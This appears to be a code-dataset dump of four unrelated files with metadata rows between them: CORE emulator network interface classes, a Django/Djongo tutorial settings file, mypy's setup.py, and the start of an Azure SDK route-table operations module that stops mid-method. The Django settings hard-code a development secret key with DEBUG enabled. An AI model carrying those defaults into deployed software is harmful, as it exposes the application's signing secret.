from core.nodes.base import CoreNetworkBase, CoreNode
DEFAULT_MTU: int = 1500
class CoreInterface:
"""
Base class for network interfaces.
"""
def __init__(
self,
session: "Session",
name: str,
localname: str,
mtu: int = DEFAULT_MTU,
server: "DistributedServer" = None,
node: "CoreNode" = None,
) -> None:
"""
Creates a CoreInterface instance.
:param session: core session instance
:param name: interface name
:param localname: interface local name
:param mtu: mtu value
:param server: remote server node will run on, default is None for localhost
:param node: node for interface
"""
if len(name) >= 16:
raise CoreError(f"interface name ({name}) too long, max 16")
if len(localname) >= 16:
raise CoreError(f"interface local name ({localname}) too long, max 16")
self.session: "Session" = session
self.node: Optional["CoreNode"] = node
self.name: str = name
self.localname: str = localname
self.up: bool = False
self.mtu: int = mtu
self.net: Optional[CoreNetworkBase] = None
self.othernet: Optional[CoreNetworkBase] = None
self._params: Dict[str, float] = {}
self.ip4s: List[netaddr.IPNetwork] = []
self.ip6s: List[netaddr.IPNetwork] = []
self.mac: Optional[netaddr.EUI] = None
# placeholder position hook
self.poshook: Callable[[CoreInterface], None] = lambda x: None
# used with EMANE
self.transport_type: TransportType = TransportType.VIRTUAL
# id of interface for node
self.node_id: Optional[int] = None
# id of interface for network
self.net_id: Optional[int] = None
# id used to find flow data
self.flow_id: Optional[int] = None
self.server: Optional["DistributedServer"] = server
self.net_client: LinuxNetClient = get_net_client(
self.session.use_ovs(), self.host_cmd
)
self.control: bool = False
def host_cmd(
self,
args: str,
env: Dict[str, str] = None,
cwd: Path = None,
wait: bool = True,
shell: bool = False,
) -> str:
"""
Runs a command on the host system or distributed server.
:param args: command to run
:param env: environment to run command with
:param cwd: directory to run command in
:param wait: True to wait for status, False otherwise
:param shell: True to use shell, False otherwise
:return: combined stdout and stderr
:raises CoreCommandError: when a non-zero exit status occurs
"""
if self.server is None:
return utils.cmd(args, env, cwd, wait, shell)
else:
return self.server.remote_cmd(args, env, cwd, wait)
def startup(self) -> None:
"""
Startup method for the interface.
:return: nothing
"""
pass
def shutdown(self) -> None:
"""
Shutdown method for the interface.
:return: nothing
"""
pass
def attachnet(self, net: "CoreNetworkBase") -> None:
"""
Attach network.
:param net: network to attach
:return: nothing
"""
if self.net:
self.detachnet()
self.net = None
net.attach(self)
self.net = net
def detachnet(self) -> None:
"""
Detach from a network.
:return: nothing
"""
if self.net is not None:
self.net.detach(self)
def add_ip(self, ip: str) -> None:
"""
Add ip address in the format "10.0.0.1/24".
:param ip: ip address to add
:return: nothing
:raises CoreError: when ip address provided is invalid
"""
try:
ip = netaddr.IPNetwork(ip)
address = str(ip.ip)
if netaddr.valid_ipv4(address):
self.ip4s.append(ip)
else:
self.ip6s.append(ip)
except netaddr.AddrFormatError as e:
raise CoreError(f"adding invalid address {ip}: {e}")
def remove_ip(self, ip: str) -> None:
"""
Remove ip address in the format "10.0.0.1/24".
:param ip: ip address to delete
:return: nothing
:raises CoreError: when ip address provided is invalid
"""
try:
ip = netaddr.IPNetwork(ip)
address = str(ip.ip)
if netaddr.valid_ipv4(address):
self.ip4s.remove(ip)
else:
self.ip6s.remove(ip)
except (netaddr.AddrFormatError, ValueError) as e:
raise CoreError(f"deleting invalid address {ip}: {e}")
def get_ip4(self) -> Optional[netaddr.IPNetwork]:
"""
Looks for the first ip4 address.
:return: ip4 address, None otherwise
"""
return next(iter(self.ip4s), None)
def get_ip6(self) -> Optional[netaddr.IPNetwork]:
"""
Looks for the first ip6 address.
:return: ip6 address, None otherwise
"""
return next(iter(self.ip6s), None)
def ips(self) -> List[netaddr.IPNetwork]:
"""
Retrieve a list of all ip4 and ip6 addresses combined.
:return: ip4 and ip6 addresses
"""
return self.ip4s + self.ip6s
def set_mac(self, mac: Optional[str]) -> None:
"""
Set mac address.
:param mac: mac address to set, None for random mac
:return: nothing
:raises CoreError: when there is an invalid mac address
"""
if mac is None:
self.mac = mac
else:
try:
self.mac = netaddr.EUI(mac, dialect=netaddr.mac_unix_expanded)
except netaddr.AddrFormatError as e:
raise CoreError(f"invalid mac address({mac}): {e}")
def getparam(self, key: str) -> float:
"""
        Retrieve a parameter value, or None if the parameter does not exist.
:param key: parameter to get value for
:return: parameter value
"""
return self._params.get(key)
def get_link_options(self, unidirectional: int) -> LinkOptions:
"""
Get currently set params as link options.
:param unidirectional: unidirectional setting
:return: link options
"""
delay = self.getparam("delay")
if delay is not None:
delay = int(delay)
bandwidth = self.getparam("bw")
if bandwidth is not None:
bandwidth = int(bandwidth)
dup = self.getparam("duplicate")
if dup is not None:
dup = int(dup)
jitter = self.getparam("jitter")
if jitter is not None:
jitter = int(jitter)
buffer = self.getparam("buffer")
if buffer is not None:
buffer = int(buffer)
return LinkOptions(
delay=delay,
bandwidth=bandwidth,
dup=dup,
jitter=jitter,
loss=self.getparam("loss"),
buffer=buffer,
unidirectional=unidirectional,
)
def getparams(self) -> List[Tuple[str, float]]:
"""
Return (key, value) pairs for parameters.
"""
parameters = []
for k in sorted(self._params.keys()):
parameters.append((k, self._params[k]))
return parameters
def setparam(self, key: str, value: float) -> bool:
"""
Set a parameter value, returns True if the parameter has changed.
:param key: parameter name to set
:param value: parameter value
:return: True if parameter changed, False otherwise
"""
        # treat None and negative values as unchanged
logger.debug("setting param: %s - %s", key, value)
if value is None or value < 0:
return False
current_value = self._params.get(key)
if current_value is not None and current_value == value:
return False
self._params[key] = value
return True
def swapparams(self, name: str) -> None:
"""
Swap out parameters dict for name. If name does not exist,
        initialize it. This is for supporting separate upstream/downstream
parameters when two layer-2 nodes are linked together.
:param name: name of parameter to swap
:return: nothing
"""
tmp = self._params
if not hasattr(self, name):
setattr(self, name, {})
self._params = getattr(self, name)
setattr(self, name, tmp)
def setposition(self) -> None:
"""
Dispatch position hook handler when possible.
:return: nothing
"""
if self.poshook and self.node:
self.poshook(self)
def __lt__(self, other: "CoreInterface") -> bool:
"""
Used for comparisons of this object.
:param other: other interface
:return: true if less than, false otherwise
"""
return id(self) < id(other)
def is_raw(self) -> bool:
"""
Used to determine if this interface is considered a raw interface.
:return: True if raw interface, False otherwise
"""
return self.transport_type == TransportType.RAW
def is_virtual(self) -> bool:
"""
Used to determine if this interface is considered a virtual interface.
:return: True if virtual interface, False otherwise
"""
return self.transport_type == TransportType.VIRTUAL
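# Editor's note: the helper below is an illustrative sketch added for
# documentation purposes; it is not part of the original CORE API and is never
# called by this module. It shows how the parameter helpers above fit together:
# setparam() stores raw per-link values and get_link_options() converts them
# into a LinkOptions object.
def _link_options_sketch(iface: "CoreInterface") -> LinkOptions:
    iface.setparam("bw", 1000000)  # bandwidth in bps
    iface.setparam("delay", 5000)  # delay in microseconds
    iface.setparam("loss", 1.5)  # loss percentage
    # unidirectional=0 applies the options in both directions
    return iface.get_link_options(unidirectional=0)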
class Veth(CoreInterface):
"""
Provides virtual ethernet functionality for core nodes.
"""
def adopt_node(self, iface_id: int, name: str, start: bool) -> None:
"""
Adopt this interface to the provided node, configuring and associating
with the node as needed.
:param iface_id: interface id for node
        :param name: name of interface for node
:param start: True to start interface, False otherwise
:return: nothing
"""
if start:
self.startup()
self.net_client.device_ns(self.name, str(self.node.pid))
self.node.node_net_client.checksums_off(self.name)
self.flow_id = self.node.node_net_client.get_ifindex(self.name)
logger.debug("interface flow index: %s - %s", self.name, self.flow_id)
mac = self.node.node_net_client.get_mac(self.name)
logger.debug("interface mac: %s - %s", self.name, mac)
self.set_mac(mac)
self.node.node_net_client.device_name(self.name, name)
self.name = name
try:
self.node.add_iface(self, iface_id)
except CoreError as e:
self.shutdown()
raise e
def startup(self) -> None:
"""
Interface startup logic.
:return: nothing
:raises CoreCommandError: when there is a command exception
"""
self.net_client.create_veth(self.localname, self.name)
if self.mtu > 0:
self.net_client.set_mtu(self.name, self.mtu)
self.net_client.set_mtu(self.localname, self.mtu)
self.net_client.device_up(self.localname)
self.up = True
def shutdown(self) -> None:
"""
Interface shutdown logic.
:return: nothing
"""
if not self.up:
return
if self.node:
try:
self.node.node_net_client.device_flush(self.name)
except CoreCommandError:
pass
if self.localname:
try:
self.net_client.delete_device(self.localname)
except CoreCommandError:
pass
self.up = False
class TunTap(CoreInterface):
"""
TUN/TAP virtual device in TAP mode
"""
def startup(self) -> None:
"""
Startup logic for a tunnel tap.
:return: nothing
"""
# TODO: more sophisticated TAP creation here
# Debian does not support -p (tap) option, RedHat does.
# For now, this is disabled to allow the TAP to be created by another
        # system (e.g. EMANE's emanetransportd)
# check_call(["tunctl", "-t", self.name])
# self.install()
self.up = True
def shutdown(self) -> None:
"""
Shutdown functionality for a tunnel tap.
:return: nothing
"""
if not self.up:
return
try:
self.node.node_net_client.device_flush(self.name)
except CoreCommandError:
logger.exception("error shutting down tunnel tap")
self.up = False
def waitfor(
self, func: Callable[[], int], attempts: int = 10, maxretrydelay: float = 0.25
) -> bool:
"""
Wait for func() to return zero with exponential backoff.
:param func: function to wait for a result of zero
:param attempts: number of attempts to wait for a zero result
:param maxretrydelay: maximum retry delay
:return: True if wait succeeded, False otherwise
"""
delay = 0.01
result = False
for i in range(1, attempts + 1):
r = func()
if r == 0:
result = True
break
msg = f"attempt {i} failed with nonzero exit status {r}"
            if i < attempts:
msg += ", retrying..."
logger.info(msg)
time.sleep(delay)
delay += delay
if delay > maxretrydelay:
delay = maxretrydelay
else:
msg += ", giving up"
logger.info(msg)
return result
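    # Editor's note (illustrative, not in the original source): with the default
    # arguments the retry delay doubles from 0.01s and is capped at
    # maxretrydelay, i.e. roughly 0.01, 0.02, 0.04, 0.08, 0.16 and then 0.25s
    # between the remaining attempts.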
def waitfordevicelocal(self) -> None:
"""
        Check for presence of a local device - the tap device may not
        appear right away, so wait for it.
        :return: nothing
"""
logger.debug("waiting for device local: %s", self.localname)
def localdevexists():
try:
self.net_client.device_show(self.localname)
return 0
except CoreCommandError:
return 1
self.waitfor(localdevexists)
def waitfordevicenode(self) -> None:
"""
        Check for presence of a node device - the tap device may not appear right away, so wait for it.
:return: nothing
"""
logger.debug("waiting for device node: %s", self.name)
def nodedevexists():
try:
self.node.node_net_client.device_show(self.name)
return 0
except CoreCommandError:
return 1
count = 0
while True:
result = self.waitfor(nodedevexists)
if result:
break
# TODO: emane specific code
# check if this is an EMANE interface; if so, continue
# waiting if EMANE is still running
should_retry = count < 5
is_emane = self.session.emane.is_emane_net(self.net)
is_emane_running = self.session.emane.emanerunning(self.node)
if all([should_retry, is_emane, is_emane_running]):
count += 1
else:
raise RuntimeError("node device failed to exist")
def install(self) -> None:
"""
Install this TAP into its namespace. This is not done from the
startup() method but called at a later time when a userspace
program (running on the host) has had a chance to open the socket
end of the TAP.
:return: nothing
:raises CoreCommandError: when there is a command exception
"""
self.waitfordevicelocal()
netns = str(self.node.pid)
self.net_client.device_ns(self.localname, netns)
self.node.node_net_client.device_name(self.localname, self.name)
self.node.node_net_client.device_up(self.name)
def set_ips(self) -> None:
"""
Set interface ip addresses.
:return: nothing
"""
self.waitfordevicenode()
for ip in self.ips():
self.node.node_net_client.create_address(self.name, str(ip))
class GreTap(CoreInterface):
"""
GRE TAP device for tunneling between emulation servers.
Uses the "gretap" tunnel device type from Linux which is a GRE device
having a MAC address. The MAC address is required for bridging.
"""
def __init__(
self,
session: "Session",
remoteip: str,
key: int = None,
node: "CoreNode" = None,
mtu: int = DEFAULT_MTU,
_id: int = None,
localip: str = None,
ttl: int = 255,
server: "DistributedServer" = None,
) -> None:
"""
Creates a GreTap instance.
:param session: core session instance
:param remoteip: remote address
:param key: gre tap key
:param node: related core node
:param mtu: interface mtu
:param _id: object id
:param localip: local address
:param ttl: ttl value
        :param server: remote server the node will run on,
            default is None for localhost
:raises CoreCommandError: when there is a command exception
"""
if _id is None:
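            # editor's note: fold the Python object id into a 16-bit value to
            # derive a reasonably unique default id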
_id = ((id(self) >> 16) ^ (id(self) & 0xFFFF)) & 0xFFFF
self.id: int = _id
sessionid = session.short_session_id()
localname = f"gt.{self.id}.{sessionid}"
name = f"{localname}p"
super().__init__(session, name, localname, mtu, server, node)
self.transport_type: TransportType = TransportType.RAW
self.remote_ip: str = remoteip
self.ttl: int = ttl
self.key: Optional[int] = key
self.local_ip: Optional[str] = localip
def startup(self) -> None:
"""
Startup logic for a GreTap.
:return: nothing
"""
self.net_client.create_gretap(
self.localname, self.remote_ip, self.local_ip, self.ttl, self.key
)
if self.mtu > 0:
self.net_client.set_mtu(self.localname, self.mtu)
self.net_client.device_up(self.localname)
self.up = True
def shutdown(self) -> None:
"""
Shutdown logic for a GreTap.
:return: nothing
"""
if self.localname:
try:
self.net_client.device_down(self.localname)
self.net_client.delete_device(self.localname)
except CoreCommandError:
logger.exception("error during shutdown")
self.localname = None
| 31.194222
| 89
| 0.572605
|
d4762f5fa375e4386805e9026e40b062b34d8858
| 4,933
|
py
|
Python
|
config/settings.py
|
ozknightwalker/Djongo-tutorial
|
6d1d86c133924a09da2832d6125966cedeff6365
|
[
"MIT"
] | null | null | null |
config/settings.py
|
ozknightwalker/Djongo-tutorial
|
6d1d86c133924a09da2832d6125966cedeff6365
|
[
"MIT"
] | null | null | null |
config/settings.py
|
ozknightwalker/Djongo-tutorial
|
6d1d86c133924a09da2832d6125966cedeff6365
|
[
"MIT"
] | null | null | null |
"""
Django settings for DjongoTutorial project.
Generated by 'django-admin startproject' using Django 3.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-a_+k(o5w_axl+o)q39iok01_$+(*%zs$fxosi+7d4h%kzsd'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# third-party applications
"rest_framework",
"drf_yasg",
"channels",
# custom apps
"apps.core",
"apps.cards",
"apps.public_chat",
"apps.api",
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': BASE_DIR / 'db.sqlite3',
# }
# }
DATABASES = {
'default': {
'ENGINE': 'djongo',
'CLIENT': {
'host': os.environ.get("DATABASE_HOST", "mongodb"),
'port': int(os.environ.get("DATABASE_PORT", "27017"))
},
'NAME': os.environ.get("DATABASE_NAME", "djongo-tutorial-database")
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
AUTH_USER_MODEL = 'auth.User'
# SALT FOR ENCODING/DECODING HASH KEYS
HASHID_FIELD_SALT = SECRET_KEY
HASHID_FIELD_ALLOW_INT_LOOKUP = True
# REDIS CONFIG
REDIS_HOSTNAME = os.environ.get("REDIS_HOSTNAME", "redis")
REDIS_READ_HOSTNAME = os.environ.get(
"REDIS_READ_HOSTNAME", REDIS_HOSTNAME
)
REDIS_PORT = os.environ.get("REDIS_PORT", "6379")
REDIS_CACHE_DB = os.environ.get("REDIS_CACHE_DB", "0")
REDIS_BROKER_DB = os.environ.get("REDIS_BROKER_DB", "1")
REDIS_ADDRESS = f"redis://{REDIS_HOSTNAME}:{REDIS_PORT}"
REDIS_READ_ADDRESS = f"redis://{REDIS_READ_HOSTNAME}:{REDIS_PORT}"
# CACHES
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": f"{REDIS_ADDRESS}/{REDIS_CACHE_DB}",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
},
"KEY_PREFIX": "rota_oeste",
},
}
# Cache time to live is 15 minutes.
CACHE_TTL = 60 * 15
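# Editor's note: illustrative usage only (not part of this settings module) --
# application code would typically consume this cache via Django's standard API:
#     from django.core.cache import cache
#     cache.set("some-key", some_value, timeout=CACHE_TTL)
#     cached = cache.get("some-key")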
# Channel
CHANNEL_LAYERS = {
"default": {
"BACKEND": "channels_redis.core.RedisChannelLayer",
"CONFIG": {
"hosts": [(REDIS_HOSTNAME, REDIS_PORT)],
},
},
}
ASGI_APPLICATION = "config.routing.application"
| 25.040609
| 91
| 0.676667
|
a393c4035205cbf06f4ccf8da870b0fb5f480b4b
| 7,289
|
py
|
Python
|
setup.py
|
Midiquin/mypy
|
a8f06c8651a4dd9b97f4989df70791b57a14e7f6
|
[
"PSF-2.0"
] | null | null | null |
setup.py
|
Midiquin/mypy
|
a8f06c8651a4dd9b97f4989df70791b57a14e7f6
|
[
"PSF-2.0"
] | null | null | null |
setup.py
|
Midiquin/mypy
|
a8f06c8651a4dd9b97f4989df70791b57a14e7f6
|
[
"PSF-2.0"
] | null | null | null |
#!/usr/bin/env python
import glob
import os
import os.path
import sys
if sys.version_info < (3, 5, 0):
sys.stderr.write("ERROR: You need Python 3.5 or later to use mypy.\n")
exit(1)
# we'll import stuff from the source tree, let's ensure is on the sys path
sys.path.insert(0, os.path.dirname(os.path.realpath(__file__)))
# This requires setuptools when building; setuptools is not needed
# when installing from a wheel file (though it is still needed for
# alternative forms of installing, as suggested by README.md).
from setuptools import setup
from setuptools.command.build_py import build_py
from mypy.version import __version__ as version
from mypy import git
git.verify_git_integrity_or_abort(".")
description = 'Optional static typing for Python'
long_description = '''
Mypy -- Optional Static Typing for Python
=========================================
Add type annotations to your Python programs, and use mypy to type
check them. Mypy is essentially a Python linter on steroids, and it
can catch many programming errors by analyzing your program, without
actually having to run it. Mypy has a powerful type system with
features such as type inference, gradual typing, generics and union
types.
'''.lstrip()
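# Editor's note: a minimal, hypothetical illustration of the kind of code the
# description above refers to, kept in a comment so it does not affect setup.py:
#     def greet(name: str) -> str:
#         return "hello " + name
#     greet(42)  # mypy flags this call: an int is passed where a str is expected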
def find_package_data(base, globs, root='mypy'):
"""Find all interesting data files, for setup(package_data=)
Arguments:
      base:  The directory to search in.
      globs: A list of glob patterns to accept files.
      root:  The directory that returned paths are made relative to.
"""
rv_dirs = [root for root, dirs, files in os.walk(base)]
rv = []
for rv_dir in rv_dirs:
files = []
for pat in globs:
files += glob.glob(os.path.join(rv_dir, pat))
if not files:
continue
rv.extend([os.path.relpath(f, root) for f in files])
return rv
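# Editor's note: hypothetical call illustrating the helper above --
# find_package_data(os.path.join('mypy', 'xml'), ['*.xslt']) returns the
# matching paths relative to the 'mypy' package root, ready for
# setup(package_data=...), as done further below.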
class CustomPythonBuild(build_py):
def pin_version(self):
path = os.path.join(self.build_lib, 'mypy')
self.mkpath(path)
with open(os.path.join(path, 'version.py'), 'w') as stream:
stream.write('__version__ = "{}"\n'.format(version))
def run(self):
self.execute(self.pin_version, ())
build_py.run(self)
cmdclass = {'build_py': CustomPythonBuild}
package_data = ['py.typed']
package_data += find_package_data(os.path.join('mypy', 'typeshed'), ['*.py', '*.pyi'])
package_data += find_package_data(os.path.join('mypy', 'xml'), ['*.xsd', '*.xslt', '*.css'])
USE_MYPYC = False
# To compile with mypyc, a mypyc checkout must be present on the PYTHONPATH
if len(sys.argv) > 1 and sys.argv[1] == '--use-mypyc':
sys.argv.pop(1)
USE_MYPYC = True
if os.getenv('MYPY_USE_MYPYC', None) == '1':
USE_MYPYC = True
if USE_MYPYC:
MYPYC_BLACKLIST = tuple(os.path.join('mypy', x) for x in (
# Need to be runnable as scripts
'__main__.py',
'sitepkgs.py',
os.path.join('dmypy', '__main__.py'),
# Uses __getattr__/__setattr__
'split_namespace.py',
# Lies to mypy about code reachability
'bogus_type.py',
# We don't populate __file__ properly at the top level or something?
# Also I think there would be problems with how we generate version.py.
'version.py',
# Written by someone who doesn't know how to deal with mypyc
'stubtest.py',
)) + (
# Don't want to grab this accidentally
os.path.join('mypyc', 'lib-rt', 'setup.py'),
)
everything = (
[os.path.join('mypy', x) for x in find_package_data('mypy', ['*.py'])] +
[os.path.join('mypyc', x) for x in find_package_data('mypyc', ['*.py'], root='mypyc')])
# Start with all the .py files
all_real_pys = [x for x in everything
if not x.startswith(os.path.join('mypy', 'typeshed') + os.sep)]
# Strip out anything in our blacklist
mypyc_targets = [x for x in all_real_pys if x not in MYPYC_BLACKLIST]
# Strip out any test code
mypyc_targets = [x for x in mypyc_targets
if not x.startswith((os.path.join('mypy', 'test') + os.sep,
os.path.join('mypyc', 'test') + os.sep,
os.path.join('mypyc', 'test-data') + os.sep,
))]
# ... and add back in the one test module we need
mypyc_targets.append(os.path.join('mypy', 'test', 'visitors.py'))
# The targets come out of file system apis in an unspecified
# order. Sort them so that the mypyc output is deterministic.
mypyc_targets.sort()
use_other_mypyc = os.getenv('ALTERNATE_MYPYC_PATH', None)
if use_other_mypyc:
# This bit is super unfortunate: we want to use a different
# mypy/mypyc version, but we've already imported parts, so we
# remove the modules that we've imported already, which will
# let the right versions be imported by mypyc.
del sys.modules['mypy']
del sys.modules['mypy.version']
del sys.modules['mypy.git']
sys.path.insert(0, use_other_mypyc)
from mypyc.build import mypycify
opt_level = os.getenv('MYPYC_OPT_LEVEL', '3')
force_multifile = os.getenv('MYPYC_MULTI_FILE', '') == '1'
ext_modules = mypycify(
mypyc_targets + ['--config-file=mypy_bootstrap.ini'],
opt_level=opt_level,
        # Use multi-file compilation mode on windows because without it
# our Appveyor builds run out of memory sometimes.
multi_file=sys.platform == 'win32' or force_multifile,
)
else:
ext_modules = []
classifiers = [
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Topic :: Software Development',
]
setup(name='mypy',
version=version,
description=description,
long_description=long_description,
author='Jukka Lehtosalo',
author_email='jukka.lehtosalo@iki.fi',
url='http://www.mypy-lang.org/',
license='MIT License',
py_modules=[],
ext_modules=ext_modules,
packages=[
'mypy', 'mypy.test', 'mypy.server', 'mypy.plugins', 'mypy.dmypy',
'mypyc', 'mypyc.test',
],
package_data={'mypy': package_data},
scripts=['scripts/mypyc'],
entry_points={'console_scripts': ['mypy=mypy.__main__:console_entry',
'stubgen=mypy.stubgen:main',
'stubtest=mypy.stubtest:main',
'dmypy=mypy.dmypy.client:console_entry',
]},
classifiers=classifiers,
cmdclass=cmdclass,
# When changing this, also update mypy-requirements.txt.
install_requires=['typed_ast >= 1.4.0, < 1.5.0',
'typing_extensions>=3.7.4',
'mypy_extensions >= 0.4.3, < 0.5.0',
],
# Same here.
extras_require={'dmypy': 'psutil >= 4.0'},
python_requires=">=3.5",
include_package_data=True,
)
| 35.906404
| 95
| 0.613802
|
458eaf9e961d3542af8e1be562ae3b60ca4b4a50
| 24,077
|
py
|
Python
|
azure-mgmt-network/azure/mgmt/network/v2017_11_01/operations/route_tables_operations.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 1
|
2021-09-07T18:36:04.000Z
|
2021-09-07T18:36:04.000Z
|
azure-mgmt-network/azure/mgmt/network/v2017_11_01/operations/route_tables_operations.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 2
|
2019-10-02T23:37:38.000Z
|
2020-10-02T01:17:31.000Z
|
azure-mgmt-network/azure/mgmt/network/v2017_11_01/operations/route_tables_operations.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 1
|
2018-08-28T14:36:47.000Z
|
2018-08-28T14:36:47.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class RouteTablesOperations(object):
"""RouteTablesOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client API version. Constant value: "2017-11-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-11-01"
self.config = config
def _delete_initial(
self, resource_group_name, route_table_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeTableName': self._serialize.url("route_table_name", route_table_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, resource_group_name, route_table_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes the specified route table.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_table_name: The name of the route table.
:type route_table_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
route_table_name=route_table_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeTables/{routeTableName}'}
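    # Editor's note: illustrative usage only; the client construction is an
    # assumption and not part of this generated file. The LROPoller returned by
    # delete() is typically driven like this:
    #     poller = network_client.route_tables.delete("my-rg", "my-route-table")
    #     poller.wait()  # or: result = poller.result()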
def get(
self, resource_group_name, route_table_name, expand=None, custom_headers=None, raw=False, **operation_config):
"""Gets the specified route table.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_table_name: The name of the route table.
:type route_table_name: str
:param expand: Expands referenced resources.
:type expand: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: RouteTable or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.network.v2017_11_01.models.RouteTable or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeTableName': self._serialize.url("route_table_name", route_table_name, 'str'),
